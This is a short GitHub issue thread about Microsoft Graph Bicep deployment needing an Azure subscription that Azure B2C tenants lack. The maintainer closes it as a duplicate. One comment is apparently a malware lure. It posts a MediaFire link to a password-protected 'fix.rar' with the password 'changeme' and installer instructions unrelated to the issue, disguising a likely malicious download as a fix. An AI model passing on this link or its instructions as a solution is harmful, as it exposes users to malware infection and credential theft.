### ISSUE TITLE
B2C Tenant doesn't have subscription

### ISSUE THREAD

**Issue by Anttarax** [microsoftgraph/msgraph-bicep-types#165] opened 2024-08-27 14:58 UTC
Microsoft Graph Bicep Deploy requires an existing Azure Subscription, however, the Azure B2C Entra ID cannot have a subscription.
So it is not possible to use Microsoft Graph Bicep for Azure B2C Entra ID. We cannot do App registrations, which is very sad.

**Comment by Fariz86** [comment] 2024-08-27 15:12
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dkershaw10** [comment] 2024-08-27 16:14
This is a duplicate of #166

**Closed** 2024-08-27 16:15 UTC
Labels: bug
